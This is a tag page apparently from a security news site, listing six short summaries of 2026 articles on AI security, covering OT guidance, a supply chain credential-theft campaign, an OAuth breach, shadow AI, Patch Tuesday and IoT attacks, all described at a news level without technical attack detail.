🏷️ AI-security

6 articles tagged AI-security.

CISA and Five Allies Tell You Not to Put LLMs in Safety-Critical OT Systems — Here's the Actual Guidance

A joint guidance document issued by CISA, the Australian Signals Directorate's ACSC, and international partners establishes principles for integrating AI into operational technology environments. The guidance explicitly differentiates acceptable AI use by Purdue Model layer, warns against LLM-first approaches for safety-critical decisions in OT, and requires AI vendors supplying OT environments to provide software bills of materials, data residency documentation, and transparent AI feature disclosure. For organizations running smart buildings and industrial systems, this is the clearest official framework yet for AI in OT.

May 26, 2026

TrapDoor: The Supply Chain Attack Targeting AI Developers That's Stealing Cloud Keys and SSH Credentials

The TrapDoor supply chain campaign, active as of May 22, 2026, is targeting AI developer communities through malicious packages in public repositories. The packages use preinstall scripts to steal cloud credentials, SSH keys, and developer secrets, then exfiltrate them through GitHub-based command and control infrastructure. The campaign is specifically targeting the tooling and repositories used by AI development teams — a population with access to cloud environments, model infrastructure, and enterprise data pipelines.

May 22, 2026

Vercel Got Hacked Through an AI Tool's OAuth Token — Every Enterprise Using Third-Party AI Has This Problem

Attackers breached Vercel by compromising Context.ai's Google Workspace OAuth application, stealing an employee's credentials and accessing customer data. The attack vector — a trusted third-party AI tool with OAuth access to enterprise systems — is present in thousands of organizations.

April 20, 2026

Shadow AI Is Your Biggest Unmanaged IoT Problem — And 76% of Organizations Already Have It

Shadow AI has surged to 76% of organizations in 2026, up from 61% a year ago. AI agents now autonomously control IoT devices, access operational systems, and make decisions without security oversight. The result is a new category of unmanaged attack surface that most enterprise security teams aren't equipped to handle.

April 17, 2026

165 Vulnerabilities, Zero-Day SharePoint Exploits, and AI Prompt Injection: Microsoft's April Patch Tuesday Is a Turning Point

Microsoft's April 2026 Patch Tuesday addressed 165 vulnerabilities — including actively exploited SharePoint zero-days and, for the first time, AI prompt injection vulnerabilities in Microsoft 365 Copilot. The AI attack surface is officially on the patch list.

April 15, 2026

AI-Powered IoT Attacks: The New Generation of Smart Office Threats in 2026

AI-driven IoT attacks surged 54% in 2026, with autonomous malware that learns, adapts, and evolves faster than human defenders can respond.

March 22, 2026

← All topics